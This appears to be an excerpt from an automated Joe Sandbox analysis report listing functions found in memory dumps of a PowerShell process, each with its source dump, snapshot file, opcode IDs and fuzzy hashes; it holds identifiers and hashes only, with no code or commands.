                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DED0 Relevance: .0, Instructions: 30COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 41b622617439df645d423326d5c034e063a763ddc33e5f1480fab781725e68c4
                                                                                                      • Instruction ID: 69eb91222d9ec3d47d1ed370ede29fb4d1bb47962332cfe0cc7cd291e7cdd801
                                                                                                      • Opcode Fuzzy Hash: 41b622617439df645d423326d5c034e063a763ddc33e5f1480fab781725e68c4
                                                                                                      • Instruction Fuzzy Hash: 60E0ED357101118F87109F1DD458C66BBEAEFCE61531640AAF545DB375DA61EC018B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F59158 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8d3da7eb6f18354af815e40eec8b56b7281cb57dda916070e5208008c19f870f
                                                                                                      • Instruction ID: a4b4dd4a882124c6eb5abba8cb038cb6607a8e41576b642950c5890f77dcfbbf
                                                                                                      • Opcode Fuzzy Hash: 8d3da7eb6f18354af815e40eec8b56b7281cb57dda916070e5208008c19f870f
                                                                                                      • Instruction Fuzzy Hash: D1F05E709003009FD768EF78D4AC79ABBE5EB01314F111969D64E97391DB387841CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DC88 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 063c04c8a48566d2648d7ef5994a16971ed008d519fb58e182c84f3b6eb4494c
                                                                                                      • Instruction ID: 2c5e752cef3beae8c3cb0ce9ddaa4f8752f5e71c5987243108ce31e68f4c068f
                                                                                                      • Opcode Fuzzy Hash: 063c04c8a48566d2648d7ef5994a16971ed008d519fb58e182c84f3b6eb4494c
                                                                                                      • Instruction Fuzzy Hash: 49E02B302426105BD309B61DDD14D9BBBADDFCA261711401DE5198B251DE60EC0187E0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DD60 Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 55f27f230c1f7c8e6177a81a15062bf2a3fd6a898764bcfa0182133421fea9c6
                                                                                                      • Instruction ID: 9a3c37b62dab9d000494c6b50891fff5c947822a751656417c5fc3e684e0eb3a
                                                                                                      • Opcode Fuzzy Hash: 55f27f230c1f7c8e6177a81a15062bf2a3fd6a898764bcfa0182133421fea9c6
                                                                                                      • Instruction Fuzzy Hash: 49E02B31701204DB8B0DDA9CD8554D8FBA9DF89210F11807ED90A5B350DA312816C7A0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5F860 Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8f7ad5b9f3158317451f5ebdc2fe9d5e8ca8482494e1cd91df1445e747ea3ed9
                                                                                                      • Instruction ID: 4deee8f4b24b009188778ce7fff02f6cc759f6972a230bbd3e52c6b331e4565e
                                                                                                      • Opcode Fuzzy Hash: 8f7ad5b9f3158317451f5ebdc2fe9d5e8ca8482494e1cd91df1445e747ea3ed9
                                                                                                      • Instruction Fuzzy Hash: 96F01275E052459B8B50DF7D884126ABFE09B06220B1481EED9549B251E632A503DBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5896A Relevance: .0, Instructions: 27COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b81be55a8a2ece16a84194161597c1533c4dffd29e5c4f393f5cdae3cbe6bee6
                                                                                                      • Instruction ID: 7aacd4627f1cbd315e304f05c7e2bd1c396ef165cf5e69baa0aa7c638266d29f
                                                                                                      • Opcode Fuzzy Hash: b81be55a8a2ece16a84194161597c1533c4dffd29e5c4f393f5cdae3cbe6bee6
                                                                                                      • Instruction Fuzzy Hash: 9EF0A034304204ABDB0D6B74D46C3AE7A99EBC5719F02115EDB1E47381CF74280287A5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F59168 Relevance: .0, Instructions: 25COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a9ea70204da254c2b0af74dcf84a04cce5f80792805d98c9e0176b6aa9ab853
                                                                                                      • Instruction ID: 9dfd13e642f29ce3d5e08b0b58e4c7f441d5d7bd9e89be72877a1311a79bb9e6
                                                                                                      • Opcode Fuzzy Hash: 0a9ea70204da254c2b0af74dcf84a04cce5f80792805d98c9e0176b6aa9ab853
                                                                                                      • Instruction Fuzzy Hash: 04F06D709003049BD7649FB9D49C79ABBE6EB44314F00552DD64EC3340DB3968818B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F58978 Relevance: .0, Instructions: 24COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 09d097689322e598e67d450387bdd634abf24add72efd745c10872a7d2e17c32
                                                                                                      • Instruction ID: 928fd7e038ab383126abed45b02435ec138ca2ecf437649f3656b1f4a91499bc
                                                                                                      • Opcode Fuzzy Hash: 09d097689322e598e67d450387bdd634abf24add72efd745c10872a7d2e17c32
                                                                                                      • Instruction Fuzzy Hash: 6BE02635304214A7CF083775A42C2AE7A96EBC4729F01012EDB0E83342CF78280283D9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F59550 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a70ec96a14795c08e0506d77d752daffdb6e7343bc6df240bbf1961e64a29350
                                                                                                      • Instruction ID: 94703d7fac0303951108b9e65eb4018a008164e75be6cc8064ba7d93801911b5
                                                                                                      • Opcode Fuzzy Hash: a70ec96a14795c08e0506d77d752daffdb6e7343bc6df240bbf1961e64a29350
                                                                                                      • Instruction Fuzzy Hash: A3D05E32B02121171A5835BA1C04ABBB5DE8BC54E5F06017ADF0AD3661ED80EC2743F1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F59549 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 235fc575a4a92bbf11371bb52a7828ec0912dd5a98bd1334bd99d8bcdd81677f
                                                                                                      • Instruction ID: 21c4bc3512bb7603aaff0d5dc240797053a4c01b7f764ee2875929079f32e14a
                                                                                                      • Opcode Fuzzy Hash: 235fc575a4a92bbf11371bb52a7828ec0912dd5a98bd1334bd99d8bcdd81677f
                                                                                                      • Instruction Fuzzy Hash: E9D05E36B42021172A5839B91E04ABB64DB8BC50DAF0B017A9F0AE3760ED50EC2743E0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DC98 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 154d14b817027b99be1e7c1471c17c1e1e87186ab0a8acc7c0ded0c0a8f49903
                                                                                                      • Instruction ID: 79c39c248754e8092cf3e15576c1cb826993603d11c3e55812f9998482b39f27
                                                                                                      • Opcode Fuzzy Hash: 154d14b817027b99be1e7c1471c17c1e1e87186ab0a8acc7c0ded0c0a8f49903
                                                                                                      • Instruction Fuzzy Hash: D9E0C2317816145B9711A62EA91485FBBEADFC8671351802EE62EC7350EEA0EC0647D5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5DD70 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                      • Instruction ID: 9d432d5cfcd1ddfc914862614ee32fc51e79531f967574572f2f7cdf6043439d
                                                                                                      • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                      • Instruction Fuzzy Hash: 65E08632B00014978B089599D4504D9F7A5DBCD220F04C47EDE0AA7350DA3269168691
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5AF88 Relevance: .0, Instructions: 23COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e09d707ce0cd9c06cc24723be99d29cbfb9c961b4c3d4f9096611db906ceb2cc
                                                                                                      • Instruction ID: 4c49de296ea262925ab959a82bd218a5cabac89c1fe3e66bd559c1cdab6c2318
                                                                                                      • Opcode Fuzzy Hash: e09d707ce0cd9c06cc24723be99d29cbfb9c961b4c3d4f9096611db906ceb2cc
                                                                                                      • Instruction Fuzzy Hash: 2FE0C236B042561BCB0DE42EA820626BBDF8BC6215B0A80BAE608CB251DD219C1382E0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F58739 Relevance: .0, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0b50db9a919dcd4f2a0573634a807f97fbcfe6bece457293c3bf92379510e1af
                                                                                                      • Instruction ID: da7c1f420645b26450f8ad1f780925860214627753b042d2c37520a94b7d0746
                                                                                                      • Opcode Fuzzy Hash: 0b50db9a919dcd4f2a0573634a807f97fbcfe6bece457293c3bf92379510e1af
                                                                                                      • Instruction Fuzzy Hash: E5E01231804109DBCB0DFFA4D87B4BDBFB8FB00311F01125DD95A572A1DA302556CA95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F58800 Relevance: .0, Instructions: 19COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a43f936e6e71e46ba4d6a523bf591f5e363cac6fd90f570061515c554a448381
                                                                                                      • Instruction ID: 39f7810f2d2a6d570e14e3d036085aee7a8d910d5d35d9d48b7eb208f4047dff
                                                                                                      • Opcode Fuzzy Hash: a43f936e6e71e46ba4d6a523bf591f5e363cac6fd90f570061515c554a448381
                                                                                                      • Instruction Fuzzy Hash: 65E08635A08209DFCB08EFA8D5A686ABFF8EB45204F014169DE4D9B3A1E7306D51CFC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5F870 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                      • Instruction ID: 772dffecc95feebac6edbd31e1afa1f33c0ec8af616b0b83ea249713dee942ba
                                                                                                      • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                      • Instruction Fuzzy Hash: 4FD06271D042099F8780EFADC94156DFBF4EB48200F5085AA8919E7311F7315612DBD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F58748 Relevance: .0, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e60cf25f112d7c5de6257ce4b874f805735a3f688982bb09fba3386df26b78e5
                                                                                                      • Instruction ID: 028c8be11f197b34fc6a3f4012b9a58daf8198d1294c930681e148f37da8d210
                                                                                                      • Opcode Fuzzy Hash: e60cf25f112d7c5de6257ce4b874f805735a3f688982bb09fba3386df26b78e5
                                                                                                      • Instruction Fuzzy Hash: D4D01731804109DBCB08ABA4E83B4BDBB74FB04301F41026DDE1F92291EA302A5ACAC0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F58810 Relevance: .0, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4aed4100ac08166b7dd82fe2039c6fe848551f2e5f5563a0b430b761d5b7a46c
                                                                                                      • Instruction ID: 0349204da4242671b3aa5c9eaecb97edb041a27c75d3053f567e37ffda2e54d6
                                                                                                      • Opcode Fuzzy Hash: 4aed4100ac08166b7dd82fe2039c6fe848551f2e5f5563a0b430b761d5b7a46c
                                                                                                      • Instruction Fuzzy Hash: 42D01734A0820ADB8B08EFA4E45686EBBB5EB48200F004269DE4D93350EA306952CBC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57938 Relevance: .0, Instructions: 14COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 930ebfb6320835cc9e70d15b1064d2972729feae59243374db8b8a84cb0b0ad1
                                                                                                      • Instruction ID: fdd4fef342164e305c0ba04e49ff35c3b47aeff0b4185254f2c2290359c86ada
                                                                                                      • Opcode Fuzzy Hash: 930ebfb6320835cc9e70d15b1064d2972729feae59243374db8b8a84cb0b0ad1
                                                                                                      • Instruction Fuzzy Hash: 9AD02331004E4587C3087B659C994103745B74131570118DCEF0DDF1B7D616B086DB74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57EA0 Relevance: .0, Instructions: 13COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bac481d64730ad8c5160236ac48b791822095ef291bc78aff539972f943a9cb3
                                                                                                      • Instruction ID: 08b7b1eac69b3bcd366faef0d7c0c62e076d0d6f0ad068ebb61d942ac0e65eec
                                                                                                      • Opcode Fuzzy Hash: bac481d64730ad8c5160236ac48b791822095ef291bc78aff539972f943a9cb3
                                                                                                      • Instruction Fuzzy Hash: BEC04C229193D00FEF0693711CAA1056FB14753615B0A4AC69E41DB176D8359C16E251
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57940 Relevance: .0, Instructions: 8COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83ef59219e92e03ecf34b85e758d00f9f450debe0254077f8e66877ec6a4fa6d
                                                                                                      • Instruction ID: c5dcf16e86b30557c8904dca4ea590ce31b1ddbb4f038e1748e904bf1b66805a
                                                                                                      • Opcode Fuzzy Hash: 83ef59219e92e03ecf34b85e758d00f9f450debe0254077f8e66877ec6a4fa6d
                                                                                                      • Instruction Fuzzy Hash: C4B09231044B09CFC249AF75E4088147329BB4021938108ACE91E0B296CE36E889CA89
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F57380 Relevance: .0, Instructions: 5COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b485e0d961e9e1d3f37b68436e09d1a64108e0df35d0f29e8300afcc2a67dbfa
                                                                                                      • Instruction ID: c0e3fb11f656540a549637a6e289328aa4a7c6ac420d0f49d4adcf671a83b6f0
                                                                                                      • Opcode Fuzzy Hash: b485e0d961e9e1d3f37b68436e09d1a64108e0df35d0f29e8300afcc2a67dbfa
                                                                                                      • Instruction Fuzzy Hash: B8A00237B1465147BF4FEA35565A53A7AA357C3201704C4AE5707C0155DD35B842A514
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 07901D80 Relevance: 15.3, Strings: 12, Instructions: 292COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $c<k$4'^q$4'^q$84Gl$84Gl$tP^q$tP^q$JJl$JJl$JJl$JJl$JJl
                                                                                                      • API String ID: 0-2639585402
                                                                                                      • Opcode ID: 8bb9f132dc11d51c87f430785c1da02da4567fc4ad0f3181ddbec8722d25b9ed
                                                                                                      • Instruction ID: 1a6c3754bd0dbc82b12c9c42fad0ee71db6e7a28f9acad6cfec616770bb8d450
                                                                                                      • Opcode Fuzzy Hash: 8bb9f132dc11d51c87f430785c1da02da4567fc4ad0f3181ddbec8722d25b9ed
                                                                                                      • Instruction Fuzzy Hash: 91913AB1B5434A8FC7258B689405A6FFBBAFFC6318F1884ABD5058B295DB31C845C3E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07903928 Relevance: 12.8, Strings: 10, Instructions: 330COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$?l$?l
                                                                                                      • API String ID: 0-327507277
                                                                                                      • Opcode ID: 35abeb90f4fa1f1eb1bc7f8ee7a0ddf33a85dbf8c3e0c71872721c99b943fa1c
                                                                                                      • Instruction ID: ff3b5b4718a4e8c8e56a508a1ac4a26a3da895451f4f7ad8eb2f40fe14f18868
                                                                                                      • Opcode Fuzzy Hash: 35abeb90f4fa1f1eb1bc7f8ee7a0ddf33a85dbf8c3e0c71872721c99b943fa1c
                                                                                                      • Instruction Fuzzy Hash: 06B147B17243559FC7248A699804B76BFAAAFC6318F1484AFD409CF3E2DA31C845C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07900FAE Relevance: 12.7, Strings: 10, Instructions: 189COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: fcq$84Gl$`Q^q$`Q^q$tP^q$$^q$$^q$$^q$$^q$$^q
                                                                                                      • API String ID: 0-771344138
                                                                                                      • Opcode ID: b5be4c322620aa9e7b733242cbae5d815e25fcbd33dc9fbf5aca7453c980a2d3
                                                                                                      • Instruction ID: 440f282478423179521e2c4920f86ee47e7cac4b3d2d9c71f65059e581f40fbe
                                                                                                      • Opcode Fuzzy Hash: b5be4c322620aa9e7b733242cbae5d815e25fcbd33dc9fbf5aca7453c980a2d3
                                                                                                      • Instruction Fuzzy Hash: C171ADB0AA420EDFDB28CE58C544BAEB7FABB45359F148455E8009B2D5C771DC84CBE1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07903678 Relevance: 8.9, Strings: 7, Instructions: 190COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$?l$?l
                                                                                                      • API String ID: 0-3395204514
                                                                                                      • Opcode ID: 871dd436b4f33d550d3e1b0bcb5b7da15800900e083b628452cb07153c0e446f
                                                                                                      • Instruction ID: f9d635857ad08e29361487792cef9c392c953ca63fb115bb03c5c0f19467b5e7
                                                                                                      • Opcode Fuzzy Hash: 871dd436b4f33d550d3e1b0bcb5b7da15800900e083b628452cb07153c0e446f
                                                                                                      • Instruction Fuzzy Hash: 725149F5B243069FCB244A298814A66BFBAAFC3614F2484BFD405CB7D1DA31C885C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07902108 Relevance: 7.6, Strings: 6, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $c<k$$^q$$^q$JJl$JJl$JJl
                                                                                                      • API String ID: 0-1194022432
                                                                                                      • Opcode ID: 4e119956c5b218f85da7d300115cea49a8c2eb64ebddb4361c243083d13543bb
                                                                                                      • Instruction ID: 3303bbde42efdeed50c889e4f03c1fe18bc52287d8cba1f495adf79bf11e5280
                                                                                                      • Opcode Fuzzy Hash: 4e119956c5b218f85da7d300115cea49a8c2eb64ebddb4361c243083d13543bb
                                                                                                      • Instruction Fuzzy Hash: F2115CF17293528FC336835C4C09A67BBB97FD2654F1449A7C9409F2AAC6758C85C3E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

